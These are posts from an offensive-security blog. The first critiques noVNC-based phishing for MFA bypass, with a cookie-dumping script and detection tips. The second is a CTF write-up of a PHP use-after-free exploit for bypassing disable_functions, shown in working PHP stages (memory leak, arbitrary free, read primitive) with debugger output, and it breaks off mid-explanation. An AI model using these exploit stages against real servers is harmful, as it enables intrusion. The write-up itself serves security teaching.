❌
There are new articles available, click to refresh the page.
Before yesterdayAdepts of 0xCC

Thoughts on the use of noVNC for phishing campaigns

9 September 2022 at 00:00

Dear Fellowlship, today’s homily is a rebuke to all those sinners who have decided to abandon the correct path of reverse proxies to bypass 2FA. Penitenziagite!

Prayers at the foot of the Altar a.k.a. disclaimer

This post will be small and succinct. It should be clear that these are just opinions about this technique that has become trendy in the last weeks, so it will be a much less technical article than we are used to. Thanks for your understanding :)

Introduction

In recent weeks, we have seen several references to this technique in the context of phishing campaigns, and its possible use to obtain valid sessions by bypassing MFA/2FA. Until now, the preferred technique for intercepting and reusing sessions to evade MFA/2FA has been the use of reverse proxies such as Evilginx or Muraena. These new proof of concepts based on HTML5 VNC clients boil down to the same concept: establishing a Man-in-the-Middle scheme between the victim’s browser and the target website, but using a browser in kiosk mode to act as a proxy instead of a server that parses and forwards the requests.

Probably the article that started this new trend was Steal Credentials & Bypass 2FA Using noVNC by @mrd0x.

Reverse proxy > noVNC

We believe the usage of noVNC and similar technologies is really interesting as proof of concepts, but at the moment they do not reach the bare minimum requirements to be used in real Red Team engagements or even pentesting. Let’s take EvilnoVNC as an example.

While testing this tool the following problems arise:

  • Navigation is clunky as hell.
  • The URL does not change, always remains the same while browsing.
  • The back button breaks the navigation in the β€œreal browser”, and not in the one inside the docker.
  • Right-click is disabled.
  • Links do not show the destination when onmouseover.
  • Wrong screen resolution.
  • Etc.

Even an untrained user would find out about these issues just with the look and feel.

Look And Feel
Look and feel.

On the other hand, the operator is heavily restricted in order to achieve a minimum of OPSEC. As an example, we can think about the most basic check we should bypass: User-Agent. Mimicking the User-Agent used by the victim is trivial when dealing with proxies, as we only need to forward it in the request from our server to the real website, but in the case of a browser using kiosk mode it is a bit more difficult to achieve. And the same goes for other modifications that we should make to the original request like, for example, blocking the navigation to a /logout endpoint that would nuke the session.

Another fun fact about this tool is… it does not work. If you test the tool you will find the following:

[email protected]:/tmp/EvilnoVNC/Downloads|main⚑ β‡’  cat Cookies.txt

        Host: .google.com
        Cookie name: AEC
        Cookie value (decrypted): Encrypted
        Creation datetime (UTC): 2022-09-10 19:44:54.548204
        Last access datetime (UTC): 2022-09-10 21:31:39.833445
        Expires datetime (UTC): 2023-03-09 19:44:54.548204
        ===============================================================

        Host: .google.com
        Cookie name: CONSENT
        Cookie value (decrypted): Encrypted
        Creation datetime (UTC): 2022-09-10 19:44:54.548350
        Last access datetime (UTC): 2022-09-10 21:31:39.833445
        Expires datetime (UTC): 2024-09-09 19:44:54.548350
        ===============================================================
(...)

Which is really odd. If you check the code from the GitHub repo…

import os
import json
import base64
import sqlite3
from datetime import datetime, timedelta

def get_chrome_datetime(chromedate):
    """Return a `datetime.datetime` object from a chrome format datetime
    Since `chromedate` is formatted as the number of microseconds since January, 1601"""
    if chromedate != 86400000000 and chromedate:
        try:
            return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)
        except Exception as e:
            print(f"Error: {e}, chromedate: {chromedate}")
            return chromedate
    else:
        return ""

def main():
    # local sqlite Chrome cookie database path
    filename = "Downloads/Default/Cookies"
    # connect to the database
    db = sqlite3.connect(filename)
    # ignore decoding errors
    db.text_factory = lambda b: b.decode(errors="ignore")
    cursor = db.cursor()
    # get the cookies from `cookies` table
    cursor.execute("""
    SELECT host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value 
    FROM cookies""")
    # you can also search by domain, e.g thepythoncode.com
    # cursor.execute("""
    # SELECT host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value
    # FROM cookies
    # WHERE host_key like '%thepythoncode.com%'""")
    # get the AES key
    for host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value in cursor.fetchall():
        if not value:
            decrypted_value = "Encrypted"
        else:
            # already decrypted
            decrypted_value = value
        print(f"""
        Host: {host_key}
        Cookie name: {name}
        Cookie value (decrypted): {decrypted_value}
        Creation datetime (UTC): {get_chrome_datetime(creation_utc)}
        Last access datetime (UTC): {get_chrome_datetime(last_access_utc)}
        Expires datetime (UTC): {get_chrome_datetime(expires_utc)}
        ===============================================================""")
        # update the cookies table with the decrypted value
        # and make session cookie persistent
        cursor.execute("""
        UPDATE cookies SET value = ?, has_expires = 1, expires_utc = 99999999999999999, is_persistent = 1, is_secure = 0
        WHERE host_key = ?
        AND name = ?""", (decrypted_value, host_key, name))
    # commit changes
    db.commit()
    # close connection
    db.close()


if __name__ == "__main__":
    main()

As you can see, the script is just a rip off from this post, but the author of EvilnoVNC deleted the part where the cookies are decrypted :facepalm:.

The cookies that you never will see
The cookies that you never will see.

You can not grab the cookies because you are setting its value to the literal string Encrypted instead of the real decrypted value :yet-another-facepalm:. We did not check if this dockerized version saves the master password in the keyring or if it just uses the hardcoded β€˜peanuts’. In the former case, copying the files to your profile shouldn’t work.

About detection

The capability to detect this technique heavily relies on what can you inspect. The current published tooling uses a barely modified version of noVNC, meaning that if you are already inspecting web JavaScript to catch malicious stuff like HTML smuggling, you could add signatures to detect the use of RFB. Of course it is trivial to bypass this by simply obfuscating the JavaScript, but you are sure to catch a myriad of ball-busting script kiddies.

psyconauta@insulanova:/tmp/EvilnoVNC/Downloads|main⚑ β‡’  curl http://localhost:5980/ 2>&1 | grep RFB
        // RFB holds the API to connect and communicate with a VNC server
        import RFB from './core/rfb.js';
        // Creating a new RFB object will start a new connection
        rfb = new RFB(document.getElementById('screen'), url,
        // Add listeners to important events from the RFB module

Moreover, all control is done through the RFB over WebSockets protocol, so it is quite easy to spot this type of traffic as it is unencrypted at the application level.

RFB traffic in clear being send through WebSockets (ws:yourdomain/websockify)
RFB traffic being sent through WebSockets (ws:yourdomain/websockify).

Additionally, because this protocol is easy to implement, you can create a small script to send keystrokes and/or mouse movements directly to escape from Chromium to the desktop.

Jailbreak
Jailbreaking chromium.

This tool executes noVNC on a docker so there is not much to do after escaping from Chromium, but think about other script kiddies who execute it directly on a server :). Automating the scanner & pwnage of this kind of phishing sites is easy if you have the time.

From the point of view of the endpoint to log into, it is easier to detect the use of a User-Agent other than the usual one. If your user base accesses your VPN web portal from Windows, someone connecting from Linux should trigger an alert.

And finally, the classic β€œtraining-education-whatever” of users would help a lot as the current state of the art is trivial to spot.

EoF

Tooling around this concept of MFA/2FA bypassing is still too rudimentary to be used in real engagements, although they are really cool proof of concepts. We believe it will evolve within the next years (or months) and people will start to work on better approaches. For now, reverse proxies are still more powerful as they can be easily configured to blend in with legitimate traffic, and the user does not experience look and feel annoyances.

We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.

In the land of PHP you will always be (use-after-)free

6 April 2022 at 12:37

Dear Fellowlship, today’s homily is about the quest of a poor human trying to escape the velvet jail of disable_functions and open_basedir in order to achieve the holy power of executing arbitrary commands. Please, take a seat and listen to the story of how our hero defeated PHP with the help of UAF The Magician.

Prayers at the foot of the Altar a.k.a. disclaimer

First of all we have to apologize because of our delay on the publication date: this post should have been released 7 days ago.

The challenge was solved only by @kachakil and @samsa2k8, you can read their approach here. About 7-8 users were participating actively during the whole week, and only 2 (plus the winners) were in the right direction to get the flag, although everyone tried to use known exploits. Our intention was to avoid that and force people to craft their exploits from scratch but… a valid flag is a valid flag :).

We are going to keep releasing different challenges during the year, so keep an eye. We promise to add a list of winners in our blog :D

In case you did not read our tweet with the challenge, you can deploy it locally with docker and try to solve it.

And last but not least, it is CRUCIAL TO READ THIS ARTICLE BEFORE: A deep dive into disable_functions bypasses and PHP exploitation. Tons of details about disable_functions and the exploit methodology is explained in depth in that article, so this information is not going to be repeated here. Be wise and stop reading the current post until you end the other.

Prologue

The intention of this first challenge was to highlight something that is pretty obvious for some of us but that others keep struggling to accept: disabling β€œwell-known” functions and restricting the paths through open_basedir IS TRIVIAL TO BYPASS. People does not realize how easy they are to bypass. If you have a web platform that have vulnerabilities that could lead to the execution of arbitrary PHP, you are fucked. PHP is so full of β€œbugs” (we will not call them β€œvulnerabilities”) in their own internals that it costs less than 5 minutes to find something abusable to bypass those restrictions.

Of course disabling functions is usefull and highly recommended because it is going to block most of script kiddies trying to pwn your server with the last vulnerability affecting a framework/CMS, but keep in mind that for a real attacker this is not going to stop him. And also this applies for pentesters and Red Teamers.

If you, our dearest reader, wonder about what sophisticated techniques we follow to identify β€œhappy accidents” that can be used for bypassing… fuzzing? code review? Nah! Just go to the PHP bug tracker and search for juicy keywords and then sort by date:

Results for use-after-free on PHP bugtracker
Results for "use-after-free" on PHP bugtracker

In our case the first one (Bug #81705 type confusion/UAF on set_error_handler with concat operation) can fit our needs as the function set_error_handler is enabled.

Dream Theater - The root of all evil

The issue and the root cause are well explained in the original report, so we are going to limit ourselves by quoting the original text:

Here is a proof of concept for crash reproduction:

<?php

$my_var = str_repeat("a", 1);
set_error_handler(
    function() use(&$my_var) {
        echo("error\n");
        $my_var = 0x123;
    }
);
$my_var .= [0];

?>

If you execute this snippet, it should cause SEGV at address 0x123.

(…)

When PHP executes the line $my_var .= [0];, it calls concat_function defined in Zend/zend_operators.c to try to concat given values. Since the given values may not be strings, concat_functiontries to convert them into strings with zval_get_string_func.

ZEND_TRY_BINARY_OBJECT_OPERATION(ZEND_CONCAT);
	ZVAL_STR(&op1_copy, zval_get_string_func(op1));
	if (UNEXPECTED(EG(exception))) {
		zval_ptr_dtor_str(&op1_copy);
		if (orig_op1 != result) {
			ZVAL_UNDEF(result);
		}
		return FAILURE;
	}

If the given value is an array, zval_get_string_func calls zend_error.

case IS_ARRAY:
	zend_error(E_WARNING, "Array to string conversion");
	return (try && UNEXPECTED(EG(exception))) ?
	NULL : ZSTR_KNOWN(ZEND_STR_ARRAY_CAPITALIZED);

Because we can register an original error handler that is called by zend_error by using set_error_handler, we can run almost arbitrary codes DURING concat_function is running.

In the above PoC, for example, $my_var will be overwritten with integer 0x123 when zend_error is triggered. concat_function, however, implicitly assumes the variables op1 and op2 are always strings, and thus type confusion occurs as a result.

Also is needed to quote this message from cmb in the same thread that clarifies the UAF situation:

The problem is that result gets released[1] if it is identical to op1_orig (which is always the case for the concat assign operator). For the script from comment 1641358352[2], that decreases the refcount to zero, but on shutdown, the literal stored in the op array will be released again. If that script is modified to use a dynamic value (range(1,4) instead of [1,2,3,4]), its is already freed, when that code in concat_function() tries to release it again.

[1] https://github.com/php/php-src/blob/php-8.1.1/Zend/zend_operators.c#L1928
[2] https://bugs.php.net/bug.php?id=81705#1641358352

So far we have a reproducible crash and primer for an exploit (in the same thread) from which we can draw ideas. In order to start building our exploit we are going to download PHP and compile it with debug symbols and without optimizations.

cd ../php-7.4.27/
./configure --disable-shared  --without-sqlite3 --without-pdo-sqlite
sed -i "s/ -O2 / -O0 /g" Makefile
make -j$(proc)
sudo make install

Here is my env (yes we are using an older version but do not worry in the epilogue we fix it :P):

PHP 7.4.27 (cli) (built: Feb 12 2022 16:45:41) ( NTS ) 
Copyright (c) The PHP Group
Zend Engine v3.4.0, Copyright (c) Zend Technologies

Let’s run the reproducible crash on GDB using php-cli:

   1860	 			}
   1861	 			op2 = &op2_copy;
   1862	 		}
   1863	 	} while (0);
   1864	 
          // op1=0x007fffffff70c0  β†’  [...]  β†’  0x0000000000000123
 β†’ 1865	 	if (UNEXPECTED(Z_STRLEN_P(op1) == 0)) {
   1866	 		if (EXPECTED(result != op2)) {
   1867	 			if (result == orig_op1) {
   1868	 				i_zval_ptr_dtor(result);
   1869	 			}
   1870	 			ZVAL_COPY(result, op2);
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "php", stopped 0x555555b44039 in concat_function (), reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x555555b44039 β†’ concat_function(result=0x7ffff3e55608, op1=0x7ffff3e55608, op2=0x7fffffff7400)
[#1] 0x555555caf4d1 β†’ zend_binary_op(op2=0x7ffff3e911d0, op1=0x7ffff3e55608, ret=0x7ffff3e55608)
[#2] 0x555555caf4d1 β†’ ZEND_ASSIGN_OP_SPEC_CV_CONST_HANDLER()
[#3] 0x555555cfb267 β†’ execute_ex(ex=0x7ffff3e13020)
[#4] 0x555555cfe6e6 β†’ zend_execute(op_array=0x7ffff3e80380, return_value=0x0)
[#5] 0x555555b5213c β†’ zend_execute_scripts(type=0x8, retval=0x0, file_count=0x3)
[#6] 0x555555a8a8ae β†’ php_execute_script(primary_file=0x7fffffffcbe0)
[#7] 0x555555d012b1 β†’ do_cli(argc=0x2, argv=0x55555678a350)
[#8] 0x555555d026e5 β†’ main(argc=0x2, argv=0x55555678a350)

We can confirm that the issue is present. If we check the original PoC reported on that bug tracker thread we can see this:

// Just for attaching a debugger.
// Removing these lines makes the exploit fail,
// but it doesn't mean this exploit depends on fopen.
// By considering the heap memory that had been allocated for the stream object and
// adjusting heap memory, the exploit will succeed again.

$f = fopen(β€˜php://stdin’, β€˜r’); 
fgets($f);

$my_var = [[1,2,3,4],[1,2,3,4]];
set_error_handler(function() use(&$my_var,&$buf){
    $my_var=1;
    $buf=str_repeat(β€œxxxxxxxx\x00\x00\x00\x00\x00\x00\x00\x00", 16);
});
$my_var[1] .= 1234;

$my_var[1] .= 1234;

$obj_addr = 0;
for ($i = 23; $i >= 16; $i--){
    $obj_addr *= 256;
    $obj_addr += ord($buf[$i]);
}

This code can be adapted to confirm the UAF issue. In our case we can edit it to leak 0x100 bytes of memory:

<?php

function leak_test() {
    $contiguous = [];
        for ($i = 0; $i < 10; $i++) {
            $contiguous[] = alloc(0x100, "D");
        }
    $arr = [[1,3,3,7], [5,5,5,5]];
    set_error_handler(function() use (&$arr, &$buf) {
        $arr = 255;
        $buf = str_repeat("\x00", 0x100);
    });
    $arr[1] .= 1337; 
    return $buf;
}


function alloc($size, $canary) {
    return str_shuffle(str_repeat($canary, $size));
}


print leak_test();

?>

When we print the $buf variable we can see memory leaked (the pointer in the hex dump is a clear indicator of it -also this pointer is a good leak of the heap-):

➜  concat-exploit php blog01.php | xxd
00000000: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000010: 6019 40b8 8f7f 0000 0601 0000 0000 0000  `[email protected]
00000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000030: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000080: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000090: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000f0: 0000 0000 0000 0000 0000 0000 0000 0000  ................

Keep in mind that PHP believes this $buf is a string so we can access to read/modify bytes in memory by just $buff[offset]. This means we have a relative write/read primitive that we need to weaponize.

The Primitives - Crash

Once we have identified the vulnerability and how to trigger it we need to find a way to get arbitrary read and write primitives. To build our exploit we are going to follow a similar schema as the exploit that Mm0r1 created for the BackTrace bug (the exploit is explained in depth in the article linked at the beggining of this post, so go and read it!).

If you remember this fragment from the quoted thread:

The problem is that result gets released[1] if it is identical to op1_orig (which is always the case for the concat assign operator)

We can take advantage of this to get the ability to release memory at our will. As we saw with the 0x123 crash example, we can forge a fake value that is going to be passed to the PHP internal functions in charge to release memory. Let’s build a De Bruijn pattern using ragg2 and use it:

<?php

function free() {

         $contiguous = [];
            for ($i = 0; $i < 10; $i++) {
                $contiguous[] = alloc(0x100, "D");
            }
        $arr = [[1,3,3,7], [5,5,5,5]];
        set_error_handler(function() use (&$arr, &$buf) {
            $arr = 1;
            $buf = str_repeat("AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABY", 0x1);
        });
        $arr[1] .= 1337;
        
    }


function alloc($size, $canary) {
    return str_shuffle(str_repeat($canary, $size));
}




print free();

?>

Fire in the hole!

─────────────────────────────────────────────────────────────────────────────────────────────── source:/home/vagrant/E[...].h+1039 ────
   1034	 	ZEND_RC_MOD_CHECK(p);
   1035	 	return ++(p->refcount);
   1036	 }
   1037	 
   1038	 static zend_always_inline uint32_t zend_gc_delref(zend_refcounted_h *p) {
          // p=0x007fffffff72b8  β†’  0x4141484141474141
 β†’ 1039	 	ZEND_ASSERT(p->refcount > 0);
   1040	 	ZEND_RC_MOD_CHECK(p);
   1041	 	return --(p->refcount);
   1042	 }
   1043	 
   1044	 static zend_always_inline uint32_t zend_gc_addref_ex(zend_refcounted_h *p, uint32_t rc) {
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "php", stopped 0x555555b44b2f in zend_gc_delref (), reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x555555b44b2f β†’ zend_gc_delref(p=0x4141484141474141)
[#1] 0x555555b44b2f β†’ i_zval_ptr_dtor(zval_ptr=0x7ffff3e5cba8)
[#2] 0x555555b44b2f β†’ concat_function(result=0x7ffff3e5cba8, op1=0x7fffffff7310, op2=0x7fffffff7320)
[#3] 0x555555caf02b β†’ zend_binary_op(op2=0x7ffff3e97390, op1=0x7ffff3e5cba8, ret=0x7ffff3e5cba8)
[#4] 0x555555caf02b β†’ ZEND_ASSIGN_DIM_OP_SPEC_CV_CONST_HANDLER()
[#5] 0x555555cfb257 β†’ execute_ex(ex=0x7ffff3e13020)
[#6] 0x555555cfe6e6 β†’ zend_execute(op_array=0x7ffff3e802a0, return_value=0x0)
[#7] 0x555555b5213c β†’ zend_execute_scripts(type=0x8, retval=0x0, file_count=0x3)
[#8] 0x555555a8a8ae β†’ php_execute_script(primary_file=0x7fffffffcbe0)
[#9] 0x555555d012b1 β†’ do_cli(argc=0x2, argv=0x55555678a350)

As we can see part of our pattern arrived to the zend_gc_delref function and crashed. This function tries to decrease the reference counter, and it is called from i_zval_ptr_dtor:

static zend_always_inline void i_zval_ptr_dtor(zval *zval_ptr)
{
	if (Z_REFCOUNTED_P(zval_ptr)) {
		zend_refcounted *ref = Z_COUNTED_P(zval_ptr);
		if (!GC_DELREF(ref)) {
			rc_dtor_func(ref);
		} else {
			gc_check_possible_root(ref);
		}
	}
}

This function is used to destroy the variable passed as argument (a pointer to the desired zval, we can see the pointer is the same used as result in the concatenation). In our case a pointer to part of the faked contents at $buf. So if we change that part for β€œX” we should verify that we can control what is going to be released:

 $buf = str_repeat("AAABAACAADAAEAAF" . XXXXXXXX . "IAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABY", 0x1);
   1034	 	ZEND_RC_MOD_CHECK(p);
   1035	 	return ++(p->refcount);
   1036	 }
   1037	 
   1038	 static zend_always_inline uint32_t zend_gc_delref(zend_refcounted_h *p) {
          // p=0x007fffffff72b8  β†’  0x5858585858585858
 β†’ 1039	 	ZEND_ASSERT(p->refcount > 0);
   1040	 	ZEND_RC_MOD_CHECK(p);
   1041	 	return --(p->refcount);
   1042	 }
   1043	 
   1044	 static zend_always_inline uint32_t zend_gc_addref_ex(zend_refcounted_h *p, uint32_t rc) {
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "php", stopped 0x555555b44b2f in zend_gc_delref (), reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x555555b44b2f β†’ zend_gc_delref(p=0x5858585858585858)
[#1] 0x555555b44b2f β†’ i_zval_ptr_dtor(zval_ptr=0x7ffff3e5d328)
[#2] 0x555555b44b2f β†’ concat_function(result=0x7ffff3e5d328, op1=0x7fffffff7310, op2=0x7fffffff7320)
[#3] 0x555555caf02b β†’ zend_binary_op(op2=0x7ffff3e95390, op1=0x7ffff3e5d328, ret=0x7ffff3e5d328)
[#4] 0x555555caf02b β†’ ZEND_ASSIGN_DIM_OP_SPEC_CV_CONST_HANDLER()
[#5] 0x555555cfb257 β†’ execute_ex(ex=0x7ffff3e13020)
[#6] 0x555555cfe6e6 β†’ zend_execute(op_array=0x7ffff3e802a0, return_value=0x0)
[#7] 0x555555b5213c β†’ zend_execute_scripts(type=0x8, retval=0x0, file_count=0x3)
[#8] 0x555555a8a8ae β†’ php_execute_script(primary_file=0x7fffffffcbe0)
[#9] 0x555555d012b1 β†’ do_cli(argc=0x2, argv=0x55555678a350)

At this point we can:

  1. Leak a pointer from memory
  2. Free arbitrarily

We can use the leaked pointer to know the location of another variable that we allocate as placeholder and then free that variable.

<?php

class exploit {
public function __construct($cmd) {
    $concat_result_addr = $this->leak_heap();
    print "[+] Concated string address:\n0x";
    print dechex($concat_result_addr);
    $this->placeholder = $this->alloc(0x4F, "B");
    $placeholder_addr = $concat_result_addr+0xe0;
    print "\n[+] Placeholder string address:"; 
    print "\n0x".dechex($placeholder_addr);
    print "\n[+] Before free:\n";
    debug_zval_dump($this->placeholder);
    $this->free($placeholder_addr);
    print "\n[+] After free:\n";
    debug_zval_dump($this->placeholder);
}


private function leak_heap() {
	$contiguous = [];
 		for ($i = 0; $i < 10; $i++) {
			$contiguous[] = $this->alloc(0x100, "D");
 		}
    $arr = [[1,3,3,7], [5,5,5,5]];
    set_error_handler(function() use (&$arr, &$buf) {
        $arr = 1337;
        $buf = str_repeat("\x00", 0x100);
    });
    $arr[1] .= $this->alloc(0x4A, "F"); // 0x4F - 5 from the length of "Array" string concatenated
    return $this->str2ptr($buf, 16);
}


private function free($var_addr) {
    $contiguous = [];
        for ($i = 0; $i < 10; $i++) {
            $contiguous[] = $this->alloc(0x100, "D");
        }
    $arr = [[1,3,3,7], [5,5,5,5]];
    set_error_handler(function() use (&$arr, &$buf, &$var_addr) {
        $arr = 1;
        $buf = str_repeat("AAABAACAADAAEAAF" . $this->ptr2str($var_addr) . "IAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABY", 0x1);
    });
    $arr[1] .= 1337;
}


private function alloc($size, $canary) {
    return str_shuffle(str_repeat($canary, $size));
}


private function str2ptr($str, $p = 0, $n = 8) {
    $address = 0;
    for($j = $n - 1; $j >= 0; $j--) {
        $address <<= 8;
        $address |= ord($str[$p + $j]);
    }
    return $address;
}

private function ptr2str($ptr, $m = 8) {
    $out = "";
    for ($i=0; $i < $m; $i++) {
        $out .= chr($ptr & 0xff);
        $ptr >>= 8;
    }
    return $out;
}

}

new exploit("haha");
?>

And we can see that it worked:

➜  concat-exploit php blog03.php 
[+] Concated string address:
0x7f763f27a070
[+] Placeholder string address:
0x7f763f27a150
[+] Before free:
string(79) "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" refcount(2)

[+] After free:
string(79) "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" refcount(1059561697)

As we said before, we are going to build step by step an exploit similar to the one explained in the article A deep dive into disable_functions bypasses and PHP exploitation, reusing as much as we can. So we are going to take advantage of our ability to free memory to create a hole that is going to be occupied by an object that we are going to use for reading/writing arbitrary memory. As we know where the hole is (the address of the placeholder, that is calculated applying an offset to the leaked address), we can access to the properties’ memory contents directly ($placeholder[offset]) and use them to leak memory at any desired address. We can perform an easy test:

<?php

class Helper { public $a, $b, $c, $d; }  

class exploit {
public function __construct($cmd) {
    $concat_result_addr = $this->leak_heap();
    print "[+] Concated string address:\n0x";
    print dechex($concat_result_addr);
    $this->placeholder = $this->alloc(0x4F, "B");
    $placeholder_addr = $concat_result_addr+0xe0;
    print "\n[+] Placeholder string address:"; 
    print "\n0x".dechex($placeholder_addr);
    $this->free($placeholder_addr);
    $this->helper = new Helper;
    $this->helper->a = "KKKK";
}


private function leak_heap() {
	$contiguous = [];
 		for ($i = 0; $i < 10; $i++) {
			$contiguous[] = $this->alloc(0x100, "D");
 		}
    $arr = [[1,3,3,7], [5,5,5,5]];
    set_error_handler(function() use (&$arr, &$buf) {
        $arr = 1337;
        $buf = str_repeat("\x00", 0x100);
    });
    $arr[1] .= $this->alloc(0x4A, "F");
    return $this->str2ptr($buf, 16);
}


private function free($var_addr) {
    $contiguous = [];
        for ($i = 0; $i < 10; $i++) {
            $contiguous[] = $this->alloc(0x100, "D");
        }
    $arr = [[1,3,3,7], [5,5,5,5]];
    set_error_handler(function() use (&$arr, &$buf, &$var_addr) {
        $arr = 1;
        $buf = str_repeat("AAABAACAADAAEAAF" . $this->ptr2str($var_addr) . "IAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABY", 0x1);
    });
    $arr[1] .= 1337;
}


private function alloc($size, $canary) {
    return str_shuffle(str_repeat($canary, $size));
}


private function str2ptr($str, $p = 0, $n = 8) {
    $address = 0;
    for($j = $n - 1; $j >= 0; $j--) {
        $address <<= 8;
        $address |= ord($str[$p + $j]);
    }
    return $address;
}

private function ptr2str($ptr, $m = 8) {
    $out = "";
    for ($i=0; $i < $m; $i++) {
        $out .= chr($ptr & 0xff);
        $ptr >>= 8;
    }
    return $out;
}

}

new exploit("haha");
?>

Our new object ($helper) is going to take the location of our $placeholder freed, so we can review the memory at that address:

gef➀  x/30g 0x7ffff3e7a150
0x7ffff3e7a150:	0x0000001800000001	0x0000000000000004
0x7ffff3e7a160:	0x00007ffff3e03018	0x00005555567527c0
0x7ffff3e7a170:	0x0000000000000000	0x00007ffff3e55ec0 <--- helper->a
0x7ffff3e7a180:	0x0000000000000006	0x8000065301d853e5
0x7ffff3e7a190:	0x0000000000000001	0x8000065301d853e5
0x7ffff3e7a1a0:	0x0000000000000001	0x8000065301d853e5
0x7ffff3e7a1b0:	0x0000000000000001	0x0000000000000000
0x7ffff3e7a1c0:	0x00007ffff3e7a230	0x0000000000000000
0x7ffff3e7a1d0:	0x0000000000000000	0x0000000000000000
0x7ffff3e7a1e0:	0x0000000000000000	0x0000000000000000
0x7ffff3e7a1f0:	0x0000000000000000	0x0000000000000000
0x7ffff3e7a200:	0x0000000000000000	0x0000000000000000
0x7ffff3e7a210:	0x0000000000000000	0x0000000000000000
0x7ffff3e7a220:	0x0000000000000000	0x0000000000000000
0x7ffff3e7a230:	0x00007ffff3e7a2a0	0x0000000000000000

We can see that the property a (that is a string) is located at 0x7ffff3e7a178 (0x7ffff3e7a150 + 0x28). We can verify it:

gef➀  x/30g 0x00007ffff3e55ec0
0x7ffff3e55ec0:	0x0000004600000001	0x800000017c8778f1
0x7ffff3e55ed0:	0x0000000000000004	0x000072004b4b4b4b <-- 4b == K
0x7ffff3e55ee0:	0x0000004600000001	0x8000000000597a79
0x7ffff3e55ef0:	0x0000000000000002	0x0000000000007a7a
0x7ffff3e55f00:	0x00007ffff3e555c0	0x00007ffff3e60300
0x7ffff3e55f10:	0x00007ffff3e60360	0x0000555556795a50
0x7ffff3e55f20:	0x00007ffff3e55f40	0x0000000000000000
0x7ffff3e55f30:	0x0000000000000000	0x0000000000000000
0x7ffff3e55f40:	0x00007ffff3e55f60	0x0000000000000000
0x7ffff3e55f50:	0x0000000000000000	0x0000000000000000
0x7ffff3e55f60:	0x00007ffff3e55f80	0x0000000000000000
0x7ffff3e55f70:	0x0000000000000000	0x0000000000000000
0x7ffff3e55f80:	0x00007ffff3e55fa0	0x0000000000000000
0x7ffff3e55f90:	0x0000000000000000	0x0000000000000000
0x7ffff3e55fa0:	0x00007ffff3e55fc0	0x0000000000000000

The β€œKKKK” (4b4b4b4b) string is in that place. In PHP 7 strings are saved inside the structure zend_string that is defined as:

struct _zend_string {
    zend_refcounted_h gc;
    zend_ulong h;
    size_t len;
    char val[1]; // NOT A "char *"
};

So if we interpret this memory as a zend_string we can visualize it better:

gef➀  print (zend_string)*0x00007ffff3e55ec0
$3 = {
  gc = {
    refcount = 0x1, 
    u = {
      type_info = 0x46
    }
  }, 
  h = 0x800000017c8778f1, 
  len = 0x4, 
  val = "K"
}

As we can overwrite bytes inside the $helper object, we can take advantage of it to overwrite the pointer to the original a string (our β€œKKKK”) with a pointer to any desired address. After overwriting the pointer, we can read safely the bytes at the address + 0x10 (len field inside zend_string) calling strlen() with our $helper->a. Using this simple trick we can get an arbitrary read primitive:

